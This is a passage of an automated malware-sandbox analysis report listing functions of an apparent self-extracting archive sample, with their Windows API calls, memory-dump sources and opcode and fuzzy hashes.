                                                                                              • Opcode Fuzzy Hash: fbc131a46a76dcba55ad113be4768bbdb6759a2867a8c32722109f76c53713a5
                                                                                              • Instruction Fuzzy Hash: E6F02B737906769F4F225F769C88B6E22C86B2E78131584F9FD1DD3101EB20CE609B90
                                                                                              Function 00C7146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C714C2
                                                                                                • Part of subcall function 00C6B146: GetVersionExW.KERNEL32(?), ref: 00C6B16B
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C714E6
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C71500
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00C71513
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71523
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C71533
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
                                                                                              • Instruction ID: 3d7eeeba6e6e439fac26823834a9bdcaa98d6ccb672954a67b04da99ed9b2339
                                                                                              • Opcode Fuzzy Hash: 72ce9149a44293818caeb97dc57298e4738c552ad4040927dd7a7a88c94986a0
                                                                                              • Instruction Fuzzy Hash: 6B31EA75108345ABC704DFA8C88499FB7F8BF98714F04591EF999C3210E734D649CBA6
                                                                                              Function 00C82AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00C82AF1,00C802FC,00C7FA34), ref: 00C82B08
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C82B16
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82B2F
                                                                                              • SetLastError.KERNEL32(00000000,00C82AF1,00C802FC,00C7FA34), ref: 00C82B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: a519fb3e9a552535d89290ec636e41ff4342d539c2b1cd39a621b0195ce8b5d3
                                                                                              • Instruction ID: 2ab14cb6840da6562770abf0d0fd23ccd5131e545bbdce6904346db9c3cd66e7
                                                                                              • Opcode Fuzzy Hash: a519fb3e9a552535d89290ec636e41ff4342d539c2b1cd39a621b0195ce8b5d3
                                                                                              • Instruction Fuzzy Hash: 5B01753211A311AFE6143AB5AC4DB3A2BD5EB51B7C760273BF521551E0EF515D40A34C
                                                                                              Function 00C897E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CA1030,00C84674,00CA1030,?,?,00C83F73,00000050,?,00CA1030,00000200), ref: 00C897E9
                                                                                              • _free.LIBCMT ref: 00C8981C
                                                                                              • _free.LIBCMT ref: 00C89844
                                                                                              • SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C89851
                                                                                              • SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C8985D
                                                                                              • _abort.LIBCMT ref: 00C89863
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 686566b1920c47430728e4c4213914a62a886de37dcb6af1c368e4a721b4f3cf
                                                                                              • Instruction ID: f561d556ed26d985d8c61218623cd70690cc9274dcb9a05daa539ba9a09dd3ea
                                                                                              • Opcode Fuzzy Hash: 686566b1920c47430728e4c4213914a62a886de37dcb6af1c368e4a721b4f3cf
                                                                                              • Instruction Fuzzy Hash: 0FF0A436140603A6C6123364AC0EB3F1A65CFE277DF29012AF524A22D2EF348916A76D
                                                                                              Function 00C7DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC47
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7DC61
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7DC72
                                                                                              • TranslateMessage.USER32(?), ref: 00C7DC7C
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7DC86
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
                                                                                              • Instruction ID: de9070013b5b0ff95849fd1c3bd6e14502414c577efc151ff0fd0f97774f4dc3
                                                                                              • Opcode Fuzzy Hash: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
                                                                                              • Instruction Fuzzy Hash: E0F01472A01259BACA216BA5EC4DFCF7F7DEF42791B008021F50AE2060D6648646CAA0
                                                                                              Function 00C6C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C6B92D: _wcsrchr.LIBVCRUNTIME ref: 00C6B944
                                                                                              • _wcslen.LIBCMT ref: 00C6C197
                                                                                              • _wcslen.LIBCMT ref: 00C6C1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
                                                                                              • Instruction ID: f1a4ff1d18e6ed82d7557142a83d56a7f775854e81d11d4140bb423205ebdd90
                                                                                              • Opcode Fuzzy Hash: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
                                                                                              • Instruction Fuzzy Hash: 92412622540351D5C731AF7488D6A7FB3A8EF41714F24490EFDE5AB181EB604F81D395
                                                                                              Function 00C7CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00C7CE9D
                                                                                                • Part of subcall function 00C6B690: _wcslen.LIBCMT ref: 00C6B696
                                                                                              • _swprintf.LIBCMT ref: 00C7CED1
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00CA946A), ref: 00C7CEF1
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7CFFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 7687980d5533188fe152c0f41577637b692176865f74d5d9227d57ed922b730f
                                                                                              • Instruction ID: 18ab468f9051a2c01d924769fc93b679f38249c04b5f6f9d48622ab9d7e438b0
                                                                                              • Opcode Fuzzy Hash: 7687980d5533188fe152c0f41577637b692176865f74d5d9227d57ed922b730f
                                                                                              • Instruction Fuzzy Hash: 394150B1900259AADF259BA0DC85FEE77BCEB15344F40C0A6FA0EE7051EE709A44DF61
                                                                                              Function 00C6BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00C6A275,?,?,00000800,?,00C6A23A,?,00C6755C), ref: 00C6BBC5
                                                                                              • _wcslen.LIBCMT ref: 00C6BC3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
                                                                                              • Instruction ID: 0619d31b6730a7b6302bd2bd89014106414cbdadfdf7849fc073d695b04e7ceb
                                                                                              • Opcode Fuzzy Hash: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
                                                                                              • Instruction Fuzzy Hash: 38416A71440256B6CF31AF60CC86EAA7BADAF45390F108466F869E2151EB70DFD09B60
                                                                                              Function 00C7B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00C7B6ED
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7B712
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7B744
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7B767
                                                                                                • Part of subcall function 00C7A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
                                                                                                • Part of subcall function 00C7A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
                                                                                                • Part of subcall function 00C7A6C2: LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
                                                                                                • Part of subcall function 00C7A6C2: LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
                                                                                                • Part of subcall function 00C7A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
                                                                                                • Part of subcall function 00C7A6C2: GlobalLock.KERNEL32(00000000), ref: 00C7A73E
                                                                                                • Part of subcall function 00C7A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00C7A762
                                                                                                • Part of subcall function 00C7A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
                                                                                                • Part of subcall function 00C7A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6
                                                                                                • Part of subcall function 00C7A6C2: GlobalFree.KERNEL32(00000000), ref: 00C7A7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              • Opcode ID: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
                                                                                              • Instruction ID: 3dce7700d9d3a13286df0a5fb535c981eb43c480dfabc7762d5489d67d1e0c9d
                                                                                              • Opcode Fuzzy Hash: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
                                                                                              • Instruction Fuzzy Hash: FB01F53690061577C7127774AC09FBF7ABAAFC0B52F088011FD18A7291DF318E0562B2
                                                                                              Function 00C7D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7D64B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00C7D661
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7D675
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00C7D684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
                                                                                              • Instruction ID: 8e03ffc24f436d41f326fde155e75b8befe0ae9a21cfa9f2db7a5e90dede541d
                                                                                              • Opcode Fuzzy Hash: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
                                                                                              • Instruction Fuzzy Hash: C8012833344214BAD2215F65AE09F5F7B7CEF5AB02F018914F30BA20D1C6A29B058775
                                                                                              Function 00C87E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C87E24,00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002), ref: 00C87E93
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C87EA6
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C87E24,00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002), ref: 00C87EC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 9474e9a3171280c62a61e4267ab82be16a41482acfe34fa030d6a3d990baee33
                                                                                              • Instruction ID: e0a92ae89abd4119905cca848bd8610161aa6b6fc196e6d440a7a1d3f8ecebf9
                                                                                              • Opcode Fuzzy Hash: 9474e9a3171280c62a61e4267ab82be16a41482acfe34fa030d6a3d990baee33
                                                                                              • Instruction Fuzzy Hash: F9F04431904218BFCB119BA0DC0DB9EBFB4EB44715F1141AAF815A2190DB319F40CB94
                                                                                              Function 00C6F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
                                                                                              • GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
                                                                                              • Instruction ID: 9f0acbf22283f2b2862503577f5b599a294d9c1135204d7d13699e253cc2983b
                                                                                              • Opcode Fuzzy Hash: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
                                                                                              • Instruction Fuzzy Hash: 15E086709507819EDB309F74A84DB067BD46F04714F14C83EF0DAD3650DBB4D5419B50
                                                                                              Function 00C82BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 7ba61f4c59b6817dd512513bb79d3472c110b9028117a41a54377eec5193dd64
                                                                                              • Instruction ID: ace130d161fabbf67f13006cf5a52cf9664ce1263a82444b08552bc7fb5c72ca
                                                                                              • Opcode Fuzzy Hash: 7ba61f4c59b6817dd512513bb79d3472c110b9028117a41a54377eec5193dd64
                                                                                              • Instruction Fuzzy Hash: 2951F571500212AFEB28AF14D84DB7AB7A4FF14318F24452FEC12475A1E731EE40E798
                                                                                              Function 00C8BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00C8BF39
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8BF5C
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8BF82
                                                                                              • _free.LIBCMT ref: 00C8BF95
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8BFA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
